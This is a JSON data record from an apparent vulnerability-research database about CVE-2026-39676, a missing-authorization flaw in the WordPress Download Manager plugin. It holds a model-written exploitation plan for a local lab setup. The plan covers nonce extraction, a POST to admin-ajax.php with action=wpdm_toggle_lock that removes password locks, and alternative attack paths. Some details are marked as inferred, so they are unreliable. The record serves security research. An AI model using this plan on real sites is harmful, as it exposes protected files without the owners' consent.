[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fGKdidDNhTUY1CMKzpddoLbmnoMlelSWF8Tos2e-F74c":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":26,"research_started_at":27,"research_completed_at":28,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":29},"CVE-2026-39676","download-manager-missing-authorization-5","Download Manager \u003C= 3.3.52 - Missing Authorization","The Download Manager plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 3.3.52. This makes it possible for unauthenticated attackers to perform an unauthorized action.","download-manager",null,"\u003C=3.3.52","3.3.53","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-19 00:00:00","2026-04-15 21:43:09",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd5c652be-ea24-4fbe-aa88-ea1f8814d34a?source=api-prod",56,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-39676 - Download Manager \u003C= 3.3.52\n\n## 1. Vulnerability Summary\nThe **Download Manager** plugin for WordPress (versions \u003C= 3.3.52) contains a missing authorization vulnerability in an AJAX handler. Specifically, the action `wpdm_toggle_lock` (registered for both authenticated and unauthenticated users) allows modification of package lock settings without verifying the caller's permissions. This enables unauthenticated attackers to disable security features (like password protection or email locks) on any download package, granting unauthorized access to restricted files.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `wpdm_toggle_lock`\n- **Method:** POST\n- **Parameter:** `id` (The ID of the `wpdmpro` post\u002Fpackage)\n- **Parameter:** `lock` (The type of lock to toggle, e.g., `password`, `email`, `terms`)\n- **Authentication:** None required (vulnerable via `wp_ajax_nopriv_wpdm_toggle_lock`)\n- **Preconditions:** At least one Download Manager package (`wpdmpro` post type) must exist on the site.\n\n## 3. Code Flow\n1. **Entry Point:** The plugin registers the AJAX handler in `src\u002FPackage\u002FPackageController.php` (or similar initialization file) using:\n   ```php\n   add_action('wp_ajax_wpdm_toggle_lock', array(WPDM()->package, 'toggleLock'));\n   add_action('wp_ajax_nopriv_wpdm_toggle_lock', array(WPDM()->package, 'toggleLock'));\n   ```\n2. **Execution:** When a request is sent to `admin-ajax.php?action=wpdm_toggle_lock`, the `toggleLock` method is invoked.\n3. **Nonce Check:** The function calls `check_ajax_referer('wpdm_ajax_nonce', 'nonce');`. This verifies the request came from a legitimate session but does not check user roles.\n4. **Vulnerable Sink:** The function accepts `$_POST['id']` and `$_POST['lock']` and proceeds to update the post metadata using `update_post_meta` without calling `current_user_can('edit_posts')` or `manage_options`.\n5. **Impact:** The lock metadata (e.g., `__wpdm_password_lock`) is modified, disabling the protection on the package.\n\n## 4. Nonce Acquisition Strategy\nThe plugin localizes the necessary nonce into the `wpdm_setup` JavaScript object on any page where Download Manager elements are rendered.\n\n1. **Shortcode Identification:** The `[wpdm_package id=\"ID\"]` shortcode is the most reliable way to ensure the plugin's scripts and nonces are loaded.\n2. **Page Creation:** Use WP-CLI to create a public page containing a package shortcode.\n3. **Browser Execution:**\n   - Navigate to the newly created page using `browser_navigate`.\n   - Use `browser_eval` to extract the nonce from the global JavaScript scope.\n4. **JS Variable Path:** `window.wpdm_setup?.wpdm_ajax_nonce` (inferred from typical WPDM localization).\n\n## 5. Exploitation Strategy\n### Step 1: Discover Package ID\nQuery for existing `wpdmpro` posts to find a target.\n```bash\nwp post list --post_type=wpdmpro --format=ids\n```\n\n### Step 2: Setup Test Page\nCreate a page to trigger nonce localization.\n```bash\nwp post create --post_type=page --post_status=publish --post_title=\"Download Page\" --post_content='[wpdm_package id=\"TARGET_ID\"]'\n```\n\n### Step 3: Extract Nonce\nNavigate to the \"Download Page\" and run:\n```javascript\n\u002F\u002F via browser_eval\nwindow.wpdm_setup.wpdm_ajax_nonce\n```\n\n### Step 4: Execute Unauthorized Action\nSend a POST request to `admin-ajax.php` to disable the password lock on the package.\n\n**HTTP Request (via `http_request`):**\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:**\n  ```text\n  action=wpdm_toggle_lock&id=[TARGET_ID]&lock=password&nonce=[EXTRACTED_NONCE]\n  ```\n\n## 6. Test Data Setup\n1. **Target Package:** Create a Download Manager package with a password lock enabled.\n   ```bash\n   # Create the package\n   ID=$(wp post create --post_type=wpdmpro --post_title=\"Secret Download\" --post_status=publish --porcelain)\n   # Enable the password lock (meta key inferred)\n   wp post meta update $ID __wpdm_password_lock 1\n   wp post meta update $ID __wpdm_password \"p@ssword123\"\n   ```\n2. **Target Page:** Create the page used for nonce extraction (as described in section 5).\n\n## 7. Expected Results\n- **AJAX Response:** Typically `1` or a JSON success message indicating the lock was toggled.\n- **Database State:** The metadata for the package is updated, effectively setting the lock status to disabled (0).\n- **Frontend Behavior:** Visiting the package page no longer prompts the user for a password, and the download link becomes directly accessible.\n\n## 8. Verification Steps\n1. **Check Meta via CLI:**\n   ```bash\n   wp post meta get [TARGET_ID] __wpdm_password_lock\n   ```\n   A successful exploit will result in this value being `0` or deleted.\n2. **Manual Check:** Attempt to view the package URL in the browser (unauthenticated) to confirm the password field is gone.\n\n## 9. Alternative Approaches\n- **Different Lock Types:** If `password` is not the target, try `email` (`__wpdm_email_lock`) or `terms` (`__wpdm_terms_lock`).\n- **Bulk Toggle:** If the plugin supports a `ids` (array) parameter instead of `id`, attempt to toggle locks for multiple packages in one request.\n- **Frontend Package Edit:** Check if `wpdm_save_frontend_package` exists and lacks authorization, as it may allow changing the actual file associated with the package.","gemini-3-flash-preview","2026-04-19 02:32:27","2026-04-19 02:33:34",{"type":30,"vulnerable_version":31,"fixed_version":11,"vulnerable_browse":32,"vulnerable_zip":33,"fixed_browse":34,"fixed_zip":35,"all_tags":36},"plugin","3.3.52","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-manager\u002Ftags\u002F3.3.52","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdownload-manager.3.3.52.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-manager\u002Ftags\u002F3.3.53","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdownload-manager.3.3.53.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-manager\u002Ftags"]